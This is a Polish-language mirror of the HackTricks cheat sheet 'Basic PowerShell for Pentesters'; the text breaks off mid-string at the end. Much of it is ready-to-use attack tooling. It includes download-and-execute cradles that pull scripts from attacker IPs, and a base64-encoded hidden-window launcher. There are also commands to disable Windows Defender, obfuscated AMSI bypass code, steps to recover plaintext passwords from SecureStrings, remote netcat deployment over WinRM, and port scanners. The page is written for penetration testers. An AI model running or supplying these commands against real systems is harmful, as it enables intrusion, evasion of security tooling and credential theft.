mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-12 21:28:55 +00:00
420 lines
31 KiB
Markdown
420 lines
31 KiB
Markdown
|
# Podstawowy PowerShell dla Pentesterów
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Ucz się i ćwicz Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Ucz się i ćwicz Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Wsparcie dla HackTricks</summary>
|
||
|
|
||
|
* Sprawdź [**plany subskrypcyjne**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegram**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Dziel się trikami hackingowymi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na GitHubie.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|
||
|
|
||
|
## Domyślne lokalizacje PowerShell
|
||
|
```powershell
|
||
|
C:\windows\syswow64\windowspowershell\v1.0\powershell
|
||
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
|
||
|
```
|
||
|
## Podstawowe polecenia PS, aby zacząć
|
||
|
```powershell
|
||
|
Get-Help * #List everything loaded
|
||
|
Get-Help process #List everything containing "process"
|
||
|
Get-Help Get-Item -Full #Get full helpabout a topic
|
||
|
Get-Help Get-Item -Examples #List examples
|
||
|
Import-Module <modulepath>
|
||
|
Get-Command -Module <modulename>
|
||
|
```
|
||
|
## Pobierz i Wykonaj
|
||
|
```powershell
|
||
|
g
|
||
|
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
|
||
|
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
|
||
|
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3
|
||
|
|
||
|
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
|
||
|
$wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr.GetResponse() IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd(
|
||
|
|
||
|
#https://twitter.com/Alh4zr3d/status/1566489367232651264
|
||
|
#host a text record with your payload at one of your (unburned) domains and do this:
|
||
|
powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
|
||
|
```
|
||
|
### Pobierz i uruchom w tle z obejściem AMSI
|
||
|
```powershell
|
||
|
Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA="
|
||
|
```
|
||
|
### Używanie b64 z linuxa
|
||
|
```powershell
|
||
|
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
|
||
|
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
|
||
|
```
|
||
|
## Pobierz
|
||
|
|
||
|
### System.Net.WebClient
|
||
|
```powershell
|
||
|
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
|
||
|
```
|
||
|
### Invoke-WebRequest
|
||
|
```powershell
|
||
|
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
|
||
|
```
|
||
|
### Wget
|
||
|
```powershell
|
||
|
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
|
||
|
```
|
||
|
### BitsTransfer
|
||
|
```powershell
|
||
|
Import-Module BitsTransfer
|
||
|
Start-BitsTransfer -Source $url -Destination $output
|
||
|
# OR
|
||
|
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
|
||
|
```
|
||
|
## Base64 Kali & EncodedCommand
|
||
|
```powershell
|
||
|
kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
|
||
|
PS> powershell -EncodedCommand <Base64>
|
||
|
```
|
||
|
## [Polityka wykonania](../authentication-credentials-uac-and-efs/#ps-execution-policy)
|
||
|
|
||
|
## [Ograniczony język](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/basic-powershell-for-pentesters/broken-reference/README.md)
|
||
|
|
||
|
## [Polityka AppLocker](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/basic-powershell-for-pentesters/broken-reference/README.md)
|
||
|
|
||
|
## Włącz WinRM (Zdalny PS)
|
||
|
```powershell
|
||
|
enable-psremoting -force #This enables winrm
|
||
|
|
||
|
# Change NetWorkConnection Category to Private
|
||
|
#Requires -RunasAdministrator
|
||
|
|
||
|
Get-NetConnectionProfile |
|
||
|
Where{ $_.NetWorkCategory -ne 'Private'} |
|
||
|
ForEach {
|
||
|
$_
|
||
|
$_|Set-NetConnectionProfile -NetWorkCategory Private -Confirm
|
||
|
}
|
||
|
```
|
||
|
## Wyłącz Defendera
|
||
|
|
||
|
{% code overflow="wrap" %}
|
||
|
```powershell
|
||
|
# Check status
|
||
|
Get-MpComputerStatus
|
||
|
Get-MpPreference | select Exclusion* | fl #Check exclusions
|
||
|
# Disable
|
||
|
Set-MpPreference -DisableRealtimeMonitoring $true
|
||
|
#To completely disable Windows Defender on a computer, use the command:
|
||
|
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
|
||
|
# Set exclusion path
|
||
|
Set-MpPreference -ExclusionPath (pwd) -disablerealtimemonitoring
|
||
|
Add-MpPreference -ExclusionPath (pwd)
|
||
|
|
||
|
# Check exclusions configured via GPO
|
||
|
Parse-PolFile .\Registry.pol
|
||
|
|
||
|
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions
|
||
|
ValueName : Exclusions_Paths
|
||
|
ValueType : REG_DWORD
|
||
|
ValueLength : 4
|
||
|
ValueData : 1
|
||
|
|
||
|
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions\Paths
|
||
|
ValueName : C:\Windows\Temp
|
||
|
ValueType : REG_SZ
|
||
|
ValueLength : 4
|
||
|
ValueData : 0
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
### Ominięcie AMSI
|
||
|
|
||
|
**`amsi.dll`** jest **ładowany** do twojego procesu i ma niezbędne **eksporty** do interakcji z dowolną aplikacją. A ponieważ jest załadowany do przestrzeni pamięci procesu, który **kontrolujesz**, możesz zmienić jego zachowanie, **nadpisując instrukcje w pamięci**. Sprawiając, że nie wykryje niczego.
|
||
|
|
||
|
Dlatego celem ominięcia AMSI, które będziesz stosować, jest **nadpisanie instrukcji tego DLL w pamięci, aby uczynić wykrywanie bezużytecznym**.
|
||
|
|
||
|
**Strona internetowa generatora ominięcia AMSI**: [**https://amsi.fail/**](https://amsi.fail/)
|
||
|
```powershell
|
||
|
# A Method
|
||
|
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
|
||
|
|
||
|
# Another: from https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1
|
||
|
$A="5492868772801748688168747280728187173688878280688776828"
|
||
|
$B="1173680867656877679866880867644817687416876797271"
|
||
|
[Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).
|
||
|
substring(($_*2),2))})-replace " " ).
|
||
|
GetField([string](38..51|%{[char][int](29+($A+$B).
|
||
|
substring(($_*2),2))})-replace " ",'NonPublic,Static').
|
||
|
SetValue($null,$true)
|
||
|
|
||
|
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
|
||
|
[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)
|
||
|
|
||
|
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
|
||
|
&( $SHELLid[1]+$SHELlId[13]+'X') (NeW-OBJEct sYStEm.iO.coMPrESSIOn.defLAtEstReam( [iO.meMorYStReAm] [cOnvErt]::froMBaSE64StRINg( 'rVHRasJAEHzvdwhGkBAhLUXwYU7i2aKFq4mQBh8Sc6bBM5HkYmq/vruQfkF7L3s7s8vM3CXv+nRw0bb6kpm7K7UN71ftjJwk1F/WDapjnZdVcZjPo6qku+aRnW0Ic5JlXd10Y4lcNfVFpK1+8gduHPXiEestcggD6WFTiDfIAFkhPiGP+FDCQkbce1j6UErMsFbIesYD3rtCPhOPDgHtKfENecZe0TzVDNRjsRhP6LCpValN/g/GYzZGxlMlXiF9rh6CGISToZ6Nn3+Fp3+XCwtxY5kIlF++cC6S2WIDEfJ7xEPeuMeQdaftPjUdfVLVGTMd2abTk4cf'), [sysTEm.iO.cOmpResSioN.COMprEssiOnMOde]::decOMPRESs ) | foreAch{NeW-OBJEct iO.STREaMREadER( $_ , [teXt.ENCoDiNg]::aScii )}).REadtoenD( )
|
||
|
|
||
|
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
|
||
|
${2}=[Ref].Assembly.GetType('Sy'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGUA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQAuAE0A')))+'an'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBnAGUA')))+'m'+'en'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dAAuAEEAdQA=')))+'t'+'om'+'at'+'io'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgAuAEEA')))+'ms'+'i'+'U'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dABpAGwA')))+'s')
|
||
|
${1}=${2}.GetField('am'+'s'+'iI'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBpAHQA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBhAGkAbAA=')))+'ed','No'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBQAHUA')))+'bl'+'i'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YwAsAFMA')))+'ta'+'ti'+'c')
|
||
|
${1}.SetValue($null,$true)
|
||
|
|
||
|
# Another Method
|
||
|
$a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'
|
||
|
$assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u))
|
||
|
$field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static')
|
||
|
$field.SetValue($null,$true)
|
||
|
|
||
|
# AMSI Bypass in python
|
||
|
https://fluidattacks.com/blog/amsi-bypass-python/
|
||
|
|
||
|
# Testing for Amsi Bypass:
|
||
|
https://github.com/rasta-mouse/AmsiScanBufferBypass
|
||
|
|
||
|
# Amsi-Bypass-Powershell
|
||
|
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
|
||
|
|
||
|
https://blog.f-secure.com/hunting-for-amsi-bypasses/
|
||
|
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
|
||
|
https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
|
||
|
https://slaeryan.github.io/posts/falcon-zero-alpha.html
|
||
|
```
|
||
|
### AMSI Bypass 2 - Hooking wywołań API w zarządzanym API
|
||
|
|
||
|
Sprawdź [**ten post, aby uzyskać szczegółowe informacje i kod**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/). Wprowadzenie:
|
||
|
|
||
|
Ta nowa technika opiera się na hooking wywołań API metod .NET. Okazuje się, że metody .NET muszą być kompilowane do natywnych instrukcji maszynowych w pamięci, które wyglądają bardzo podobnie do natywnych metod. Te skompilowane metody mogą być hookowane, aby zmienić przepływ sterowania programu.
|
||
|
|
||
|
Kroki wykonania hooking wywołań API metod .NET to:
|
||
|
|
||
|
1. Zidentyfikuj docelową metodę do hookowania
|
||
|
2. Zdefiniuj metodę o tym samym prototypie funkcji co cel
|
||
|
3. Użyj refleksji, aby znaleźć metody
|
||
|
4. Upewnij się, że każda metoda została skompilowana
|
||
|
5. Znajdź lokalizację każdej metody w pamięci
|
||
|
6. Nadpisz docelową metodę instrukcjami wskazującymi na naszą złośliwą metodę
|
||
|
|
||
|
### AMSI Bypass 3 - Uprawnienia SeDebug
|
||
|
|
||
|
[**Postępując zgodnie z tym przewodnikiem i kodem**](https://github.com/MzHmO/DebugAmsi), możesz zobaczyć, jak z wystarczającymi uprawnieniami do debugowania procesów możesz uruchomić proces powershell.exe, debugować go, monitorować, kiedy ładuje `amsi.dll` i wyłączyć go.
|
||
|
|
||
|
### AMSI Bypass - Więcej zasobów
|
||
|
|
||
|
* [S3cur3Th1sSh1t/Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell)
|
||
|
* [Amsi Bypass na Windows 11 w 2023](https://gustavshen.medium.com/bypass-amsi-on-windows-11-75d231b2cac6) [Github](https://github.com/senzee1984/Amsi\_Bypass\_In\_2023)
|
||
|
|
||
|
## PS-History
|
||
|
```powershell
|
||
|
Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
|
||
|
```
|
||
|
## Znajdź nowsze pliki
|
||
|
|
||
|
Opcje: `CreationTime`, `CreationTimeUtc`, `LastAccessTime`, `LastAccessTimeUtc`, `LastWriteTime`, `LastWriteTimeUtc`
|
||
|
```powershell
|
||
|
# LastAccessTime:
|
||
|
(gci C:\ -r | sort -Descending LastAccessTime | select -first 100) | Select-Object -Property LastAccessTime,FullName
|
||
|
|
||
|
# LastWriteTime:
|
||
|
(gci C:\ -r | sort -Descending LastWriteTime | select -first 100) | Select-Object -Property LastWriteTime,FullName
|
||
|
```
|
||
|
## Uzyskaj uprawnienia
|
||
|
```powershell
|
||
|
Get-Acl -Path "C:\Program Files\Vuln Services" | fl
|
||
|
```
|
||
|
## Wersja systemu operacyjnego i poprawki HotFix
|
||
|
```powershell
|
||
|
[System.Environment]::OSVersion.Version #Current OS version
|
||
|
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
|
||
|
Get-Hotfix -description "Security update" #List only "Security Update" patches
|
||
|
```
|
||
|
## Środowisko
|
||
|
```powershell
|
||
|
Get-ChildItem Env: | ft Key,Value -AutoSize #get all values
|
||
|
$env:UserName @Get UserName value
|
||
|
```
|
||
|
## Inne podłączone dyski
|
||
|
```powershell
|
||
|
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
|
||
|
```
|
||
|
### Kosz
|
||
|
```powershell
|
||
|
$shell = New-Object -com shell.application
|
||
|
$rb = $shell.Namespace(10)
|
||
|
$rb.Items()
|
||
|
```
|
||
|
[https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/](https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/)
|
||
|
|
||
|
## Rekonesansja domeny
|
||
|
|
||
|
{% content-ref url="powerview.md" %}
|
||
|
[powerview.md](powerview.md)
|
||
|
{% endcontent-ref %}
|
||
|
|
||
|
## Użytkownicy
|
||
|
```powershell
|
||
|
Get-LocalUser | ft Name,Enabled,Description,LastLogon
|
||
|
Get-ChildItem C:\Users -Force | select Name
|
||
|
```
|
||
|
## Bezpieczny ciąg do tekstu jawnego
|
||
|
```powershell
|
||
|
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
|
||
|
$user = "HTB\Tom"
|
||
|
$cred = New-Object System.management.Automation.PSCredential($user, $pass)
|
||
|
$cred.GetNetworkCredential() | fl
|
||
|
|
||
|
UserName : Tom
|
||
|
Password : 1ts-mag1c!!!
|
||
|
SecurePassword : System.Security.SecureString
|
||
|
Domain : HTB
|
||
|
```
|
||
|
Lub bezpośrednie analizowanie formatu XML:
|
||
|
```powershell
|
||
|
$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *
|
||
|
|
||
|
UserName : Tom
|
||
|
Password : 1ts-mag1c!!!
|
||
|
SecurePassword : System.Security.SecureString
|
||
|
Domain : HTB
|
||
|
```
|
||
|
## SUDO
|
||
|
```powershell
|
||
|
#CREATE A CREDENTIAL OBJECT
|
||
|
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
|
||
|
$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)
|
||
|
|
||
|
#For local:
|
||
|
Start-Process -Credential ($cred) -NoNewWindow powershell "iex (New-Object Net.WebClient).DownloadString('http://10.10.14.11:443/ipst.ps1')"
|
||
|
|
||
|
#For WINRM
|
||
|
#CHECK IF CREDENTIALS ARE WORKING EXECUTING whoami (expected: username of the credentials user)
|
||
|
Invoke-Command -Computer ARKHAM -ScriptBlock { whoami } -Credential $cred
|
||
|
#DOWNLOAD nc.exe
|
||
|
Invoke-Command -Computer ARKHAM -ScriptBlock { IWR -uri 10.10.14.17/nc.exe -outfile nc.exe } -credential $cred
|
||
|
|
||
|
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process C:\xyz\nc.bat -verb Runas}'
|
||
|
|
||
|
#Another method
|
||
|
$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
|
||
|
$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
|
||
|
$computer = "<hostname>"
|
||
|
```
|
||
|
## Grupy
|
||
|
```powershell
|
||
|
Get-LocalGroup | ft Name #All groups
|
||
|
Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators
|
||
|
```
|
||
|
## Schowek
|
||
|
```powershell
|
||
|
Get-Clipboard
|
||
|
```
|
||
|
## Procesy
|
||
|
```powershell
|
||
|
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
|
||
|
```
|
||
|
## Usługi
|
||
|
```
|
||
|
Get-Service
|
||
|
```
|
||
|
## Hasło z bezpiecznego ciągu
|
||
|
```powershell
|
||
|
$pw=gc admin-pass.xml | convertto-securestring #Get the securestring from the file
|
||
|
$cred=new-object system.management.automation.pscredential("administrator", $pw)
|
||
|
$cred.getnetworkcredential() | fl * #Get plaintext password
|
||
|
```
|
||
|
## Zaplanowane zadania
|
||
|
```powershell
|
||
|
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
|
||
|
```
|
||
|
## Sieć
|
||
|
|
||
|
### Skanowanie portów
|
||
|
```powershell
|
||
|
# Check Port or Single IP
|
||
|
Test-NetConnection -Port 80 10.10.10.10
|
||
|
|
||
|
# Check Port List in Single IP
|
||
|
80,443,8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "Port $_ is open!"} 2>$null
|
||
|
|
||
|
# Check Port Range in single IP
|
||
|
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("10.10.10.10", $_)) "TCP port $_ is open"} 2>$null
|
||
|
|
||
|
# Check Port List in IP Lists - 80,443,445,8080
|
||
|
"10.10.10.10","10.10.10.11" | % { $a = $_; write-host "[INFO] Testing $_ ..."; 80,443,445,8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("$a",$_)) "$a : $_ is open!"} 2>$null}
|
||
|
|
||
|
```
|
||
|
### Interfejsy
|
||
|
```powershell
|
||
|
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
|
||
|
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
|
||
|
```
|
||
|
### Zapora ogniowa
|
||
|
```powershell
|
||
|
Get-NetFirewallRule -Enabled True
|
||
|
|
||
|
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block
|
||
|
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Allow
|
||
|
Get-NetFirewallRule -Direction Inbound -Enabled True -Action Block
|
||
|
Get-NetFirewallRule -Direction Inbound -Enabled True -Action Allow
|
||
|
|
||
|
# Open SSH to the world
|
||
|
New-NetFirewallRule -DisplayName 'SSH (Port 22)' -Direction Inbound -LocalPort 22 -Protocol TCP -Action Allow
|
||
|
|
||
|
# Get name, proto, local and rremote ports, remote address, penable,profile and direction
|
||
|
## You can user the following line changing the initial filters to indicat a difefrent direction or action
|
||
|
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Table -Property DisplayName, @{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}}, @{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}},Profile,Direction,Action
|
||
|
```
|
||
|
### Trasa
|
||
|
```powershell
|
||
|
route print
|
||
|
```
|
||
|
### ARP
|
||
|
```powershell
|
||
|
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
|
||
|
```
|
||
|
### Hosty
|
||
|
```powershell
|
||
|
Get-Content C:\WINDOWS\System32\drivers\etc\hosts
|
||
|
```
|
||
|
### Ping
|
||
|
```powershell
|
||
|
$ping = New-Object System.Net.Networkinformation.Ping
|
||
|
1..254 | % { $ping.send("10.9.15.$_") | select address, status }
|
||
|
```
|
||
|
### SNMP
|
||
|
```powershell
|
||
|
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
|
||
|
```
|
||
|
## **Konwertowanie ciągu SDDL na format czytelny**
|
||
|
```powershell
|
||
|
PS C:\> ConvertFrom-SddlString "O:BAG:BAD:AI(D;;DC;;;WD)(OA;CI;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-3842939050-3880317879-2865463114-522)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-498)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;CI;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CC;4828cc14-1437-45bc-9b07-ad6f015e5f28;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a86-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a9c-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aa5-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aba-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;5cb41ed0-0e4c-11d0-a286-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;RP;4c164200-20c0-11d0-a768-00aa006e0529;;S-1-5-21-3842939050-3880317879-2865463114-5181)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;9a7ad945-ca53-11d1-bbd0-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967991-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a0a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;9a9a021e-4a5b-11d1-a9c3-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;0296c120-40da-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;934de926-b09e-11d2-aa06-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5e353847-f36c-48be-a7f7-49685402503c;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;8d3bca50-1d7e-11d0-a081-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-